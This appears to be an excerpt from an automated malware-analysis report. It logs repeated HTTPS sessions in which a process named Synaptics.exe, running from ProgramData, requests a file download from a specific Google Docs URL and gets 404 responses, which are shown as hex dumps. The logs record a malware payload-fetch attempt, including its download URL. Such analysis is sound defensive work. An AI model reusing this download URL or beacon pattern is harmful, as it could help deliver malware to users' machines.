                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ubOx9veCJU4hBeKyuZXouw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:03 UTC770INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:03 UTC770INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        254192.168.2.350038142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:03 UTC767OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:03 UTC770INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:03 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-lm3GsbNDxriOSHyzgPj0ew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Report-To: {"group":"DriveUntrustedContentHttp","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/DriveUntrustedContentHttp/external"}]}
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin; report-to="DriveUntrustedContentHttp"
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:03 UTC772INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 4e 38 61 2b 54 4b 76 4b 4d 48 69 4f 6e 45 64 67 5a 6b 57 75 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xN8a+TKvKMHiOnEdgZkWug">*{margin:0;padding:0}html,code{font:15px/22px arial,sans
                                                                                                                                                                                        2022-05-17 11:32:03 UTC773INData Raw: 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e 0d 0a
                                                                                                                                                                                        Data Ascii: l=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>
                                                                                                                                                                                        2022-05-17 11:32:03 UTC773INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        255192.168.2.350039142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:03 UTC770OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:03 UTC774INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:03 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-rG6UUZ+dEedvlnYdQJOTGQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:03 UTC775INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:03 UTC775INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 32 49 42 55 62 4f 7a 59 63 66 37 55 4e 6f 2f 70 47 6a 65 47 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="S2IBUbOzYcf7UNo/pGjeGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:03 UTC776INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:03 UTC776INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        256192.168.2.350040142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:03 UTC773OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:03 UTC777INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:03 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-+jYqIAcrVcZrxQEpWE9A4w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:03 UTC778INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:03 UTC778INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 2f 55 73 69 30 42 49 63 75 51 72 64 75 74 76 72 36 67 4f 4b 59 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="/Usi0BIcuQrdutvr6gOKYg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:03 UTC779INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:03 UTC779INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        257192.168.2.350041142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:03 UTC776OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:03 UTC780INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:03 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-2kXwWrkDgfDd9pqHCSSuDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:03 UTC781INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:03 UTC781INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 64 44 49 50 38 74 51 2b 4f 2b 39 2b 50 65 49 50 45 54 65 78 52 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="dDIP8tQ+O+9+PeIPETexRA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
                                                                                                                                                                                        2022-05-17 11:32:03 UTC782INData Raw: 30 25 7d 7d 23 6c 6f 67 6f 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 35 34 70 78 3b 77 69 64 74 68 3a 31 35 30 70 78 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 61 69 6e 20 69 64 3d 22 61 66 2d 65 72 72 6f 72 2d 63 6f 6e 74 61 69 6e 65 72 22 20 72 6f 6c 65 3d 22 6d 61 69 6e 22 3e 3c 61 20 68 72 65 66 3d 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 20 72 6f 6c 65 3d 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20
                                                                                                                                                                                        Data Ascii: 0%}}#logo{display:inline-block;height:54px;width:150px}</style><main id="af-error-container" role="main"><a href=//www.google.com><span id=logo aria-label=Google role=img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not
                                                                                                                                                                                        2022-05-17 11:32:03 UTC782INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                        258192.168.2.350043142.250.186.46443C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                        2022-05-17 11:32:03 UTC779OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                        User-Agent: Synaptics.exe
                                                                                                                                                                                        Host: docs.google.com
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        2022-05-17 11:32:03 UTC783INHTTP/1.1 404 Not Found
                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                        Date: Tue, 17 May 2022 11:32:03 GMT
                                                                                                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                        Content-Security-Policy: script-src 'report-sample' 'nonce-wp7IWKVuC4kI87h1X00h+g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                        Server: ESF
                                                                                                                                                                                        X-XSS-Protection: 0
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                                                                                                                                                                        Accept-Ranges: none
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                        2022-05-17 11:32:03 UTC784INData Raw: 36 36 61 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68
                                                                                                                                                                                        Data Ascii: 66a<html lang=en><meta ch
                                                                                                                                                                                        2022-05-17 11:32:03 UTC784INData Raw: 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 36 54 76 57 50 62 43 59 63 58 63 61 70 47 6e 55 6e 66 4d 44 2b 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66
                                                                                                                                                                                        Data Ascii: arset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="6TvWPbCYcXcapGnUnfMD+A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff
